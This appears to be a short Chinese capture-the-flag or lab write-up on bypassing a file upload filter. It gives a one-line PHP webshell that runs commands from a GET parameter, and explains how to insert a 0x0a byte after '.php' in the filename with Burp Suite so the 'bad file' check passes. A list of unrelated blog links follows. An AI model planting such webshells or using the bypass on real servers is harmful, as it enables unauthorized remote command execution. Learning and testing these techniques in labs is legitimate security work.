Web页面:
新建一个一句话木马:
0.php
<?php system($_GET[0]); ?>上传木马, burpsuite 抓包。
直接上传是回显 bad file。
我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。
send 后,我们访问一下。发现木马上传成功。
相关推荐
软件供应链安全指南1 分钟前
悬镜安全:情报驱动的供应链安全治理仰泳之鹅3 分钟前
【杂谈】如何将文件夹列入白名单以避免被安全中心当做病毒删掉软件供应链安全指南5 分钟前
权威认证加持!云鲨RASP v4.0:信通院认可的应用内生安全防御标杆内心如初5 分钟前
09_等保系列之等保2.0安全解决方案梁辰兴36 分钟前
计算机网络基础:进程之间的通信byzh_rc1 小时前
[深度学习网络从入门到入土] 反向传播backprop信看1 小时前
SIM7600x SIM826X 实现HTTP(S) POST一条闲鱼_mytube1 小时前
智能体设计模式全景总结:21个模式快速串联指南极安代理1 小时前
什么是HTTP隧道,怎么理解HTTP隧道?水境传感 张园园1 小时前
自来水厂水质监测站:用数据守护饮水安全